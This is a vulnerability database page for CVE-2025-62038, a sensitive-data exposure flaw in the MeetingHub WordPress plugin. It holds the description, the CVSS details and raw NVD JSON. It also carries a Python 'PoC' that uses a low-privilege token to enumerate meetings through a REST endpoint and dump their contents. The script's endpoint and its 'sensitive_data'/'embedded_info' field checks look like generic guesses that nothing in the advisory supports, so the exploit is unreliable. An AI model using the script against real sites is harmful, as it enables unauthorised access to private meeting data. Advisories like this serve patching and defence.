Security Vulnerability Report
中文
CVE-2025-62038 CVSS 6.5 MEDIUM

CVE-2025-62038

Published: 2025-11-06 16:16:10
Last Modified: 2026-04-27 17:16:31

Description

Insertion of Sensitive Information Into Sent Data vulnerability in Sovlix MeetingHub meetinghub allows Retrieve Embedded Sensitive Data.This issue affects MeetingHub: from n/a through <= 1.23.9.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MeetingHub <= 1.23.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62038 PoC - MeetingHub Sensitive Data Exposure import requests import json target_url = "http://target-site.com/wp-json/meetinghub/v1/meetings" # Authentication headers (low-privilege user) headers = { "Authorization": "Bearer YOUR_LOW_PRIVILEGE_TOKEN", "Content-Type": "application/json" } # Step 1: List all meetings accessible to the user response = requests.get(target_url, headers=headers) if response.status_code == 200: meetings = response.json() print(f"Found {len(meetings)} meetings") # Step 2: Extract sensitive data from each meeting for meeting in meetings: meeting_id = meeting.get('id') detail_url = f"{target_url}/{meeting_id}" detail_response = requests.get(detail_url, headers=headers) if detail_response.status_code == 200: meeting_data = detail_response.json() # Check for embedded sensitive information if 'sensitive_data' in meeting_data or 'embedded_info' in meeting_data: print(f"[!] Sensitive data found in meeting {meeting_id}") print(json.dumps(meeting_data, indent=2)) else: print(f"Request failed with status code: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62038", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:10.230", "lastModified": "2026-04-27T17:16:30.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Sovlix MeetingHub meetinghub allows Retrieve Embedded Sensitive Data.This issue affects MeetingHub: from n/a through <= 1.23.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/meetinghub/vulnerability/wordpress-meetinghub-plugin-1-23-9-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}